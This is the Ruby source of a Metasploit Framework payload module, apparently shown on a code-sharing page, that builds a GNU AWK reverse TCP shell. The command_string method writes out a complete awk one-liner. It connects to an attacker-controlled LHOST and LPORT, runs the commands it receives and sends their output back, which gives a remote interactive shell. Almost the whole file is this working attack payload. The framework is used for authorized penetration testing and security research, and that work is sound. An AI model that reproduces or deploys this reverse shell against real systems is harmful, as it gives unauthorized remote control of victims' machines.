Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 154
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(merge_info(info,
16
      'Name'          => 'Unix Command Shell, Reverse TCP (via AWK)',
17
      'Description'   => 'Creates an interactive shell via GNU AWK',
18
      'Author'        =>
19
        [
20
          'espreto <robertoespreto[at]gmail.com>',
21
          'Ulisses Castro <uss.thebug[at]gmail.com>',
22
          'Gabriel Quadros <gquadrossilva[at]gmail.com>'
23
        ],
24
      'License'       => MSF_LICENSE,
25
      'Platform'      => 'unix',
26
      'Arch'          => ARCH_CMD,
27
      'Handler'       => Msf::Handler::ReverseTcp,
28
      'Session'       => Msf::Sessions::CommandShell,
29
      'PayloadType'   => 'cmd',
30
      'RequiredCmd'   => 'gawk',
31
      'Payload'       =>
32
        {
33
          'Offsets' => { },
34
          'Payload' => ''
35
        }
36
      ))
37
  end
38

39
  #
40
  # Constructs the payload
41
  #
42
  def generate(_opts = {})
43
    super + command_string
44
  end
45

46
  #
47
  # Returns the command string to use for execution
48
  #
49
  def command_string
50
    awkcmd = <<~AWK
51
      awk 'BEGIN{
52
        s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";
53
        do{
54
          if((s|&getline c)<=0)
55
            break;
56
          if(c){
57
            while((c|&getline)>0)print $0|&s;
58
            close(c)
59
          }
60
        } while(c!=\"exit\")
61
        close(s)
62
      }'
63
    AWK
64
    awkcmd.gsub!("\n",'').gsub!('  ', '')
65
  end
66
end
67

68